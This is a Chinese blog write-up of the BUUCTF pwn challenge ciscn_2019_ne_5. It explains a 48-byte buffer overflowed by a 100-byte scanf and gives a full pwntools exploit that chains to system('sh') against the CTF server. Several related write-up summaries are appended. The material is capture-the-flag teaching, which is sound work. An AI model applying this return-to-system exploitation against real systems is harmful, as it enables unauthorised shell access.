BUUCTF-ciscn_2019_ne_51

利用ROP GetShell
最新推荐文章于 2025-02-15 13:30:44 发布
原创 最新推荐文章于 2025-02-15 13:30:44 发布 · 420 阅读 · 1 ·
CC 4.0 BY-SA版权
版权声明:本文为博主原创文章,遵循 CC 4.0 BY 版权协议,转载请附上原文出处链接和本声明。
文章标签:

#linux #运维 #服务器

本文介绍了一个利用ROP技术进行缓冲区溢出攻击的例子。通过分析一个存在main函数scanf漏洞的程序,利用system函数和精心构造的payload,成功获取了shell。文章详细展示了从漏洞发现到编写并发送恶意payload的全过程。

0x1 checksec

 根据文件名可知是other shellcode

0x2 IDA

1.main函数

s1只有48,但是scanf读入100,存在溢出点

2.GetFlag函数 

flag就是我们的log

读程序流程

 

case 1,添加一个log,然后case 4去get flag

程序存在system函数

调用bin/sh  去getshell

但是该题有一个小点

用ROPgadget搜不到'/bin/sh' 字符串

'/sh'    'sh'     

system的参数不一定必须是“/bin/sh”,单独的“sh”也可以拿到shell

 

0x3 EXP

from pwn import*

r=remote("node4.buuoj.cn",29072)
elf=ELF('20ciscn2019ne5')
system_addr=elf.sym['system']
shell_addr=0x80482ea

r.recvuntil('Please input admin password:')
r.sendline('administrator')

r.recvuntil('0.Exit\n:')
r.sendline('1')

payload='a'*(0x48+4)+p32(system_addr)+'1234'+p32(shell_addr)

r.recvuntil('Please input new log info:')
r.sendline(payload)

r.recvuntil('0.Exit\n:')
r.sendline('4')

r.interactive()

[buuctf]ciscn_2019_ne_5
逆向萌新的博客
11-05 2092
buuctf ciscn_2019_ne_5题目分析
BUUCTF ciscn_2019_ne_5
2401_88087539的博客
01-14 531
pwn新手小白,写完题后整理的一点点思路,有借鉴其他wp,有任何问题各位师傅可以提出,接收批评指正
buuctf13-17题
XDiku的博客
01-29 258
ok
BUUCTF-ciscn_2019_n_51
Rt1Text的博客
10-09 489
没有开启保护,有可写segments,考虑shellcode。
[BUUCTF]PWN5——ciscn_2019_n_1
mcmuyanga的博客
08-25 2604
[BUUCTF]4——ciscn_2019_n_1 题目网址:https://buuoj.cn/challenges#ciscn_2019_n_1 步骤: 例行检查,64位,开启了nx保护 nc一下看看输入点的字符串,看运行结果猜测是一个猜数的程序,而且需要我们猜的数应该是11.28125 输入11.28125,发现还是不对 用64位ida打开,首先shift+f12查看程序里的字符串,发现了 “ cat /flag ” 双击跟进,ctrl+x找到调用这个字符串的函数 我们可以看到第10行的if
[BUUCTF]-PWN:ciscn_2019_n_3解析
2301_79326813的博客
01-20 1010
堆题,先看保护32位,Partial RELRO,没pie关键信息就那么多,看ida大致就是alloc创建堆块,free释放堆块,dump打印堆块内容但是仔细看这三个函数就可以发现在实际运行中,会先创建一个存有free相关函数的地址和打印堆块内容相关函数的地址。看delete函数并结合动态调试,可以知道释放堆块的过程实际上是调用先创造的12字节堆块的rec_str_free。那也就意味着无论那块地址存的是哪里的地址,我们在free堆块时他都会执行,并且题目给了我们system。
BUUCTF ciscn_2019_n_5
红叶的博客
10-31 1942
通过 puts 函数泄露真实地址,通过LibcSearcher查询Libc中后3位相同的Libc,dump并计算出 system 、 /bin/sh 的偏移。但是有个问题,如果本地打不进去可以尝试更换系统打,我的Kali打不进去换了个Ubuntu进去了。既然没开NX,那代表栈是可执行的,只需要构造shellcode即可直接获取shell。Payload_Name --- 用来跳过第一步的输入 name。Payload_Leak --- 用来进行溢出并获取地址。完全是裸的程序,基本上一点保护都没开。
BUUCTF-pwn-ciscn_2019_ne_51
qq_30528603的博客
11-29 472
我们看到strcpy是将src的内容复制到dest。我们前面看到src允许我们输入128个字节。而dest数组离ebp只有0x48个字节。32为程序没有canary没有PIE,应该是简单的栈溢出。程序上来是输入一个密码验证。随便输入下错误直接退出。那么我们需要构造的东西都有了,接着就是找溢出点。它会把我们的输入放入src这个数组中。主函数大致流程在此。当找不到/bin/sh的时候,可以用sh代替。这里就有一个小技巧了。
buuctf ciscn_2019_n_5
最新发布
qq_53912227的博客
02-15 260
发现有个name的全局变量(bss),这个时候就想到用ret2shellcode,但是实际上是不行的,因为这个name的bss不具有x权限。shift+f12发现没有system和binsh等字符串,因此就需要用到ret2libc,这里的puts正好提前被使用了。发现NX unknown(想到了ret2shellcode)这个时候就可以确定ret2shellcode不行。开局:典型的ret2libc,老规矩,file 文件。
BUUCTF 刷题 ciscn_2019_n_5
Helloity的博客
02-09 3330
先附上题目:BUUCTF在线评测 放到我们的虚拟机上checksec一下,64位程序,拥有RWX段。 Arch: amd64-64-little RELRO: Partial RELRO Stack: No canary found NX: NX disabled PIE: No PIE (0x400000) RWX: Has RWX segments 接下来放到IDA里f5一下,可以看到主函数读
BUUCTFciscn_2019_n_1 1
qq_41560595的博客
09-24 4841
这道题是栈溢出题型,又不同于一般的栈溢出,在此做个总结。 查看权限 拖入IDA,F5可用函数 解题思路:这道题的意思是输入字符串v1,判断v2。考虑输入长字符串覆盖到存储v2的内存空间,把v2的值改掉。 因此,覆盖0x30-0x4=44个字节给v1,另外4个字节给v2 由于v2数值在内存中以16进制存储,所以,找到11.28125的16进制值。 存在两个比较指令,双击进去。 0x41348000就是16进制的11.28125。 编写脚本 from pwn import * p=remote('
BUUCTF ciscn_2019_n_1 1
qq_56313338的博客
09-10 457
可以通过溢出v2来覆盖v1的值从而获取flag首先v1是浮点数11.28125的二进制是0x413480。
BUUCTF ciscn_2019_n_1
RookieMOR的博客
05-14 823
1.下载文件,用checksec一下: 2.用IDA64查看,进入func函数: 当v2=11.28125时获得flag,但只有v1的输入,没有v2输入。因为有一个gets函数,点击v1,v2可以知道,v1与v2差44个字节,可以通过输入v1的值去改变v2的值,实现栈溢出。 查看汇编可以看到有一个uconiss的比较指令,把xmm0与cs:dword_4007F4,由movss可以知道xmme0是v1或v2的值,那么点击dword_4007F4 看到一个 dd ,百度一下可以知道,.
[每日一PWN]BUUCTF ciscn_2019_n_1
qq_55233040的博客
11-21 676
这道题双解,一种ret2text,另一种就是单纯的覆盖数据改变判断结果。
[BUUCTF-pwn]——ciscn_2019_n_1
Y_peak的博客
01-31 1469
[BUUCTF-pwn]——ciscn_2019_n_1 [BUUCTF-pwn]——ciscn_2019_n_1思路一 —— 覆盖局部变量思路二 —— 覆盖返回地址 题目地址:https://buuoj.cn/challenges#ciscn_2019_n_1 题目: 老规矩下载下来后,在Linux上checksec一下,64位,并且没有开启栈保护,意味着我们可以利用栈溢出 在IDA中看一下,main函数里面没有什么可以利用的 双击func函数看看,就是我们想要的。 思路一 —— 覆盖局部变量
BUUCTFciscn_2019_n_5 Write Up
古月浪子的博客
08-06 592
这个反编译有点不准确,不过大概意思能理解到,先读入0x64字符到bss段上,然后用gets函数读入到栈上 什么保护都没开,我们发现可以直接执行bss段上的代码 思路很简单,将shellcode写入bss段,然后栈溢出rop到bss段上执行shellcode,拿到shell 注意栈帧大小 from pwn import * from LibcSearcher import * from struct import pack context.os='linux' context.arch='amd64'.
BUUCTF Pwn ciscn_2019_n_1 1
qq_45200829的博客
11-08 488
BUUCTF Pwn类型 ciscn_2019_n_1 1 解题过程
BUUCTF ciscn_2019_es_1
doudoudedi
01-04 999
我本地直接用fastbin attack直接能打通但是远程似乎有问题 思路 首先申请一个smallbin大小的trunk然后释放打印得到libc基址,然后double free打fastbin attack之后写到libc去__malloc_hook写入one_gadget再次add获取shell 以下为ubuntu16的环境下本地也就是libc-2.23 exp: #!/usr/bin/pyth...
深入解析better-tN_EYE_NE的HTML优化技巧
然而,“better-tN_EYE_NE”和“better-tN_EYE_NE-master”这样的命名并不直观地传达项目的具体内容,使得我们必须通过已有的信息进行合理的推测。 首先,我们来详细解析这个标题“better-tN_EYE_NE”。在这里,...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值